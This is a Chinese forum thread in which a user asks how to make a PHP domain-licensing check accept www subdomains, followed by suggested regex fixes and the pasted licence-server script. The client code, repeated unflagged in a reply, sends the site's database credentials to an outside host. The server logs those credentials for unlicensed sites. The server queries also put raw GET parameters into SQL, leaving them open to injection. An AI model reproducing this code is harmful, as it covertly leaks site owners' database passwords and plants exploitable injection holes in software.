php域名授权问题

ssj99818 · 发表于 2024-2-21 22:59

这段是域名授权代码，只能够单域名验证，比如我在后台授权了顶级域名baidu.com，他用www.baidu.com
就会提示未授权。哪位大佬能否帮我看一下这代码能否改成www的也能通过

function OreoClass($oreoconfig){ //其中$oreoconfig是您的数据库链接处的变量定义，吧您的数据库变量替换$oreoconfig。
error_reporting(0);
function getTopDomainhuo(){
$host=$_SERVER['HTTP_HOST'];

$matchstr="[^\.]+\.(?:(".$str.")|\w{2}|((".$str.")\.\w{2}))$";
if(preg_match("/".$matchstr."/ies",$host,$matchs)){
$domain=$matchs['0'];
}else{
$domain=$host;
}
return $domain;
}
$authid="30a483fac"; //这里=后面的字符是在设置授权程序页面配置程序后生成的系统验证码
$domain=getTopDomainhuo();
$real_domain='baidu.com'; //本地检查时用户的授权域名和时间
$check_host = 'http://c1.811666.xyz/oreo_look.php';  // http://后是您的域名.
$oreo_check = $check_host . '?a=client_check&u=' . $_SERVER['HTTP_HOST'] . '&authid=' . $authid . '&sysnum=' . $authid. '&host=' . $oreoconfig['host']. '&port=' . $oreoconfig['port'] . '&user=' . $oreoconfig['user']. '&pwd=' .$oreoconfig['pwd'] . '&dbname=' . $oreoconfig['dbname'];    //其中$oreoconfig是您的数据库链接处的变量定义，吧您的数据库变量替换$oreoconfig。
$check_message = $check_host . '?a=check_message&u=' . $_SERVER['HTTP_HOST'] . '&authid=' . $authid . '&sysnum=' . $authid.'&host=' . $oreoconfig['host'] . '&port=' . $oreoconfig['port'] . '&user=' . $oreoconfig['user']. '&pwd=' . $oreoconfig['pwd'] . '&dbname=' . $oreoconfig['dbname'];    //其中$oreoconfig是您的数据库链接处的变量定义，吧您的数据库变量替换$oreoconfig。
$oreo_info=file_get_contents($oreo_check);
$oreo_message = file_get_contents($check_message);
if($oreo_info=='1'){
echo $oreo_message;
die;
}elseif($oreo_info=='2'){
echo $oreo_message;
die;
}elseif($oreo_info=='3'){
echo $oreo_message;
die;
}
elseif($oreo_info=='4'){
echo $oreo_message;
die;
}
if($oreo_info!=='0'){ // 远程检查失败的时候本地检查
if($domain!==$real_domain){
   echo '远程检查失败了。请联系授权提供商QQ:10001。';
   die;
}
}
unset($domain);
}

a774733519 · 发表于 2024-2-21 22:59

改进 getTopDomainhuo 函数

[PHP] 纯文本查看 复制代码

function OreoClass($oreoconfig){   
    //其中$oreoconfig是您的数据库链接处的变量定义，吧您的数据库变量替换$oreoconfig。
    error_reporting(0);

    function getTopDomainhuo(){
        $host = $_SERVER['HTTP_HOST'];

        // 解析主域名，包含所有子域名
        $parsedUrl = parse_url('http://' . $host);
        $host = $parsedUrl['host'];
        $hostParts = explode('.', $host);

        // 如果是类似于[url]www.baidu.com[/url]的情况，取最后两个部分
        if(count($hostParts) >= 2) {
            $domain = $hostParts[count($hostParts) - 2] . '.' . $hostParts[count($hostParts) - 1];
        } else {
            $domain = $host;
        }

        return $domain;
    }

    $authid = "30a483fac"; //这里=后面的字符是在设置授权程序页面配置程序后生成的系统验证码                       
    $domain = getTopDomainhuo();
    $real_domain = 'baidu.com'; //本地检查时 用户的授权域名 和时间
    $check_host = 'http://c1.811666.xyz/oreo_look.php';  // http://后是您的域名.
    $oreo_check = $check_host . '?a=client_check&u=' . $_SERVER['HTTP_HOST'] . '&authid=' . $authid . '&sysnum=' . $authid . '&host=' . $oreoconfig['host'] . '&port=' . $oreoconfig['port'] . '&user=' . $oreoconfig['user'] . '&pwd=' . $oreoconfig['pwd'] . '&dbname=' . $oreoconfig['dbname'];         //其中$oreoconfig是您的数据库链接处的变量定义，吧您的数据库变量替换$oreoconfig。
    $check_message = $check_host . '?a=check_message&u=' . $_SERVER['HTTP_HOST'] . '&authid=' . $authid . '&sysnum=' . $authid . '&host=' . $oreoconfig['host'] . '&port=' . $oreoconfig['port'] . '&user=' . $oreoconfig['user'] . '&pwd=' . $oreoconfig['pwd'] . '&dbname=' . $oreoconfig['dbname'];         //其中$oreoconfig是您的数据库链接处的变量定义，吧您的数据库变量替换$oreoconfig。
    $oreo_info = file_get_contents($oreo_check);
    $oreo_message = file_get_contents($check_message);

    if ($oreo_info == '1') {
        echo $oreo_message;
        die;
    } elseif ($oreo_info == '2') {
        echo $oreo_message;
        die;
    } elseif ($oreo_info == '3') {
        echo $oreo_message;
        die;
    } elseif ($oreo_info == '4') {
        echo $oreo_message;
        die;
    }
    
    if ($oreo_info !== '0') { // 远程检查失败的时候 本地检查
        if ($domain !== $real_domain) {
            echo '远程检查失败了。请联系授权提供商QQ:10001。';
            die;
        }
    }
    
    unset($domain);       
}

52bug · 发表于 2024-2-22 00:06

试试文言一心或者chatGPT

Takitooru · 发表于 2024-2-22 00:32

$matchstr = "([^\.]+\.)?[^\.]+\.(?:(".$str.")|\w{2}|((".$str.")\.\w{2}))$";

ETH · 发表于 2024-2-22 00:40

对getTopDomainhuo()函数进行修改

function getTopDomainhuo(){
$host = $_SERVER['HTTP_HOST'];
$matchstr = "([^\.]+\.(?:(".$str.")|\w{2}|((".$str.")\.\w{2}))$)|(^www\.[^\.]+\.(?:(".$str.")|\w{2}|((".$str.")\.\w{2}))$)";
if(preg_match("/".$matchstr."/ies",$host,$matchs)){
$domain = $matchs['0'];
}else{
$domain = $host;
}
return $domain;
}

修改后的正则表达式允许匹配带有www前缀的域名。请将这段代码替换原有的getTopDomainhuo()函数定义即可。这样代码将能够验证顶级域名和带有www前缀的域名。

ETH · 发表于 2024-2-22 00:41

差不多就是上面的样子了

rainisa · 发表于 2024-2-22 09:22

靠一句正则验证是否顶级域不靠谱，正常是需要去验证TLDs和eTLD 列表

ssj99818 · 发表于 2024-2-22 13:01

Takitooru 发表于 2024-2-22 00:32
$matchstr = "([^\.]+\.)?[^\.]+\.(?:(".$str.")|\w{2}|((".$str.")\.\w{2}))$";

首先感谢辛苦帮忙，替换了，还是不行哈

ssj99818 · 发表于 2024-2-22 13:02

ETH 发表于 2024-2-22 00:40
对getTopDomainhuo()函数进行修改

首先感谢大佬辛苦帮忙，替换了，还是不行哈

ssj99818 · 发表于 2024-2-22 13:14

附上oreo_look.php文件代码，大家帮看看要怎么弄哈

<?php
/**
*，，，
* =======================================================
*/
include './oreo/oreo.core.php';
date_default_timezone_set('PRC');
header("content-type:text/html;charset=utf-8");

$ac = $_GET['a'];
$ver = $_GET['v'];
$url = $_GET['u'];
$key = $_GET['key'];
$authid = $_GET['authid'];
$ip = getIP();
$file_name = $_GET['f'];
$file_dir = '/oreoupdatafilesxcas'; //远程升级补丁存放目录
$sq_host = $_GET['host'];
$sq_port = $_GET['port'];
$sq_user = $_GET['user'];
$sq_pwd = $_GET['pwd'];
$sq_dbname = $_GET['dbname'];
$sysnum = $_GET['sysnum'];
$uid=$_GET['userid'];

// 内次查询最后的版本

$ubeta=$DB->query("SELECT * FROM `oreo_user` WHERE id='$uid' LIMIT 1 ")->fetch();
if($ubeta['beta']==1){
$rowbb=$DB->query("SELECT * FROM `oreo_version` WHERE authid='$sysnum' and beta='1' or beta='0' ORDER BY `id` DESC LIMIT 1 ")->fetch();
$lastver = $rowbb['name']; // 最新版本
$lastver = sprintf("%1.1f",$lastver);
}else{
$rowbb=$DB->query("SELECT * FROM `oreo_version` WHERE authid='$sysnum' and beta='0' ORDER BY `id` DESC LIMIT 1 ")->fetch();
$lastver = $rowbb['name']; // 最新版本
$lastver = sprintf("%1.1f",$lastver);
}
// 版本号0.1递增
$newver = $ver+0.1;
$newver = sprintf("%01.1f",$newver);
if(!$ac){
echo '无权操作!';
die;
}
// 客户端IP
if($ac=='getip'){
echo getIP();
die;
}
// 检查新版本更新内容
if($ac=='chanage'){
if($ubeta['beta']==1){
$row=$DB->query("SELECT * FROM `oreo_version` WHERE name='$ver' and beta='1' ")->fetch();
}else
$row=$DB->query("SELECT * FROM `oreo_version` WHERE name='$ver' ")->fetch();
echo base64_decode($row['content']);
}
// 检查新版本
if($ac=='check'){
 if($ver<$lastver){
 echo $newver;
 die;
 }else{
 echo $lastver;
die;
 }
}

//升级代码
if($ac=='update'){
$domain_pd = get_domain($url);
$time=time();
$row=$DB->query("SELECT * FROM `oreo_authorize` WHERE domain='$domain_pd' ")->fetch();
$yumi=$row['yumi'];
$yumi_host = $yumi;
$yumi_info = file_get_contents($yumi_host);
if($yumi_info == $yumi_host ){
 $yumi_info = $url;
 }else{
 $yumi_info = get_domain($url);
 }
// 首先检查域名是否授权

$domain_url = $yumi_info; //获得系统域名
$time=time();

$row=$DB->query("SELECT * FROM `oreo_authorize` WHERE domain='$domain_url' ")->fetch();
if($row){
 $domain_time=$row['time'];
$domain_dqversion=$row['version'];
$dqv=$row['version'];
 $domain_key=$row['syskey'];
 $domain_ip=$row['ip'];

}else{
$row2=$DB->query("select * from oreo_authorize where domain='$domain_url' ")->fetch(); //查询授权库
if(!$row2){
$row3=$DB->query("select * from oreo_daoban where domain='$domain_url'")->fetch(); //查询盗版库
if(!$row3){
$sdss=$DB->exec("INSERT INTO `oreo_daoban` (`domain`, `time`, `sql_host`, `sql_port`, `sql_user`, `sql_pwd`, `sql_dbname`) VALUES ('$domain_url', '$time', '{$sq_host}','{$sq_port}', '{$sq_user}', '{$sq_pwd}', '{$sq_dbname}')"); //如果无授权并无盗版记录写入新盗版记录
}else{
 $sqs=$DB->exec("update `oreo_daoban` set `time` = '$time',`sql_host` = '{$sq_host}',`sql_port` = '{$sq_port}',`sql_user` = '{$sq_user}',`sql_pwd` = '{$sq_pwd}',`sql_dbname` = '{$sq_dbname}' WHERE `domain` = '$domain_url'"); //如果无授权并已有盗版记录更新新盗版记录
}
echo '1'; //域名未授权
die;
}
}

if(!empty($key)){
if($key != $domain_key){
echo '升级秘钥错误'; die;
}
}else{
echo '升级秘钥不能为空'; die;
}

if ($time>$domain_time){
 $status = '失败:授权时间到期';
 $status = base64_encode($status);
 $sds=$DB->exec("INSERT INTO `oreo_log` (`domain`, `time`, `version`, `status`) VALUES ('{$domain_url}', '{$time}', '{$ver}', '{$status}')");
 echo '授权已经到期到期时间为'.date("Y-m-d",$domain_time).'';
 die;
}

if($ver>=$lastver){
 $status = '失败:已经是最新版';
 $status = base64_encode($status);
 $sds=$DB->exec("INSERT INTO `oreo_log` (`domain`, `time`, `version`, `status`) VALUES ('{$domain_url}', '{$time}', '{$ver}', '{$status}')");
 echo '已经是最新版不需要升级';
 die;
}

// 先升级到最近的版本
$sysnum = $_GET['sysnum'];
$cxyh=$DB->query("SELECT * FROM `oreo_version` where name='$newver' and authid='$sysnum' ")->fetch();
$sjbbanbenhao = $cxyh['name']; //得到升级到最近的版本的版本号

//判断授权域名的库中历史升级版本号 $domain_dqversion //防止客户站重复升级，只能升级一次（防盗版）
if($dqv>=$sjbbanbenhao){
echo '贵站已经是最新版了'; die;
}

if($domain_dqversion<$sjbbanbenhao){
$sqs=$DB->exec("update `oreo_authorize` set `version` ='{$sjbbanbenhao}' where `domain`='$domain_url'");
$file = $cxyh['file'];
echo $file; //得到升级包真实下载地址
}

$status = '成功';
$status = base64_encode($status);
$sds=$DB->exec("INSERT INTO `oreo_log` (`domain`, `time`, `version`, `status`) VALUES ('{$domain_url}', '{$time}', '{$ver}', '{$status}')");
die;

}

//检查授权代码
if($ac == 'client_check'){
$domain_pd = get_domain($url);
$authid = $_GET['authid'];
$time=time();
$row=$DB->query("SELECT * FROM `oreo_authorize` WHERE domain='$domain_pd' and authid='$authid' ")->fetch();
$yumi=$row['yumi'];
$yumi_host = $yumi;
$yumi_info = file_get_contents($yumi_host);
if($yumi_info == $yumi_host ){
 $yumi_info = $_GET['u'];
 }else{
 $yumi_info = get_domain($url);
 }
// 首先检查域名是否授权
$domain_url = $yumi_info; //获得系统域名
$time=time();
$row2=$DB->query("select * from oreo_authorize where domain='$domain_url' ")->fetch(); //查询授权库
if(!$row2){
$row3=$DB->query("select * from oreo_daoban where domain='$domain_url'")->fetch(); //查询盗版库
if(!$row3){
$sdss=$DB->exec("INSERT INTO `oreo_daoban` (`domain`, `time`, `sql_host`, `sql_port`, `sql_user`, `sql_pwd`, `sql_dbname`) VALUES ('$domain_url', '$time', '{$sq_host}','{$sq_port}', '{$sq_user}', '{$sq_pwd}', '{$sq_dbname}')"); //如果无授权并无盗版记录写入新盗版记录
}else{
 $sqs=$DB->exec("update `oreo_daoban` set `time` = '$time',`sql_host` = '{$sq_host}',`sql_port` = '{$sq_port}',`sql_user` = '{$sq_user}',`sql_pwd` = '{$sq_pwd}',`sql_dbname` = '{$sq_dbname}' WHERE `domain` = '$domain_url'"); //如果无授权并已有盗版记录更新新盗版记录
}
echo '1'; //域名未授权
die;
}

$domain_ip=$row2['ip'];
$ip_qh=$row2['ip_qh'];
$auth_id=$row2['authid'];
if(!empty($authid)){
if($authid!=$auth_id){
 echo "4"; //检测授权程序
 die;
}}

if($conf['oreo_dqsj']==1){
$time=time();
$domain_time=$row2['time'];
if ($time>$domain_time){
 echo '2'; //授权过期
 die;
}}

$szsq = $ip_qh;
$ip_info = file_get_contents($szsq);
if($ip_info == $szsq ){
 }else{
if($ip!==$domain_ip){
 echo '3'; //授权IP验证
 die;
}}

$row3=$DB->query("select * from oreo_daoban where domain='$domain_url'")->fetch(); //如果通过，先查是否有盗版记录
if($row3){
$zbsc=$DB->exec("DELETE FROM oreo_daoban WHERE domain='$domain_url' ");} //如果有盗版记录就删除盗版记录
echo '0'; //通过

}else{
// 客户端检查
if($ac == 'check_message'){
$domain_pd = get_domain($url);
$time=time();

$row=$DB->query("SELECT * FROM `oreo_authorize` WHERE domain='$domain_pd' and authid='$authid' ")->fetch();
$yumi=$row['yumi'];
$yumi_host = $yumi;
$yumi_info = file_get_contents($yumi_host);
if($yumi_info == $yumi_host ){
 $yumi_info = $_GET['u'];
 }else{
 $yumi_info = get_domain($url);
 }
// 首先检查域名是否授权
$domain_url = $yumi_info; //获得系统域名
$time=time();
$row2=$DB->query("select * from oreo_authorize where domain='$domain_url' ")->fetch(); //查询授权库
if(!$row2){
$row3=$DB->query("select * from oreo_daoban where domain='$domain_url'")->fetch(); //查询盗版库
if(!$row3){
$sdss=$DB->exec("INSERT INTO `oreo_daoban` (`domain`, `time`, `sql_host`, `sql_port`, `sql_user`, `sql_pwd`, `sql_dbname`) VALUES ('$domain_url', '$time', '{$sq_host}','{$sq_port}', '{$sq_user}', '{$sq_pwd}', '{$sq_dbname}')"); //如果无授权并无盗版记录写入新盗版记录
}else{
 $sqs=$DB->exec("update `oreo_daoban` set `time` = '$time',`sql_host` = '{$sq_host}',`sql_port` = '{$sq_port}',`sql_user` = '{$sq_user}',`sql_pwd` = '{$sq_pwd}',`sql_dbname` = '{$sq_dbname}' WHERE `domain` = '$domain_url'"); //如果无授权并已有盗版记录更新新盗版记录
}
echo $conf['message_1']; //域名未授权
die;
}

$domain_ip=$row2['ip'];
$ip_qh=$row2['ip_qh'];
$auth_id=$row2['authid'];
if(!empty($authid)){
if($authid!=$auth_id){
 echo $conf['message_4']; //检测授权程序
 die;
}}

if($conf['oreo_dqsj']==1){
$time=time();
$domain_time=$row['time'];
$domain_ip=$row['ip'];

if ($time>$domain_time){
 echo $conf['message_2']; //授权过期
 die;
}}

$szsq = $ip_qh;
$ip_info = file_get_contents($szsq);
if($ip_info == $szsq ){
 }else{
if($ip!==$domain_ip){
 echo $conf['message_3']; //授权IP验证
 die;
}}
$row3=$DB->query("select * from oreo_daoban where domain='$domain_url'")->fetch(); //如果通过，先查是否有盗版记录
if($row3){
$zbsc=$DB->exec("DELETE FROM oreo_daoban WHERE domain='$domain_url' ");} //如果有盗版记录就删除盗版记录
echo '0'; //通过
}
}

//到期时间代码
if($ac == 'client_check_time'){
$domain_pd = get_domain($url);
$time=time();

$row=$DB->query("SELECT * FROM `oreo_authorize` WHERE domain='$domain_pd' and authid='$authid' ")->fetch();
$yumi=$row['yumi'];
$yumi_host = $yumi;
$yumi_info = file_get_contents($yumi_host);
if($yumi_info == $yumi_host ){
 $yumi_info = $_GET['u'];
 }else{
 $yumi_info = get_domain($url);
 }
// 首先检查域名是否授权

$domain_url = $yumi_info; //获得系统域名

$row=$DB->query("SELECT * FROM `oreo_authorize` WHERE domain='$domain_pd' and authid='$authid' ")->fetch();

if($row) {
echo '0'; //域名未授权
 die;
}

$domain_time=$row['time'];
echo $domain_time;
}

//下载文件
if($ac == 'down'){

// 不允许直接访问下载
$url = $_SERVER['HTTP_REFERER'];

if(!$url){
 //echo '来路不正确';
 //die;
}

$file = $file_dir.'/'.$file_name;
header('Location: '.$file.'');
}

?>

帐号		自动登录	找回密码
密码			注册[Register]

[其他求助] php域名授权问题

最佳答案

本帖被以下淘专辑推荐:

免费评分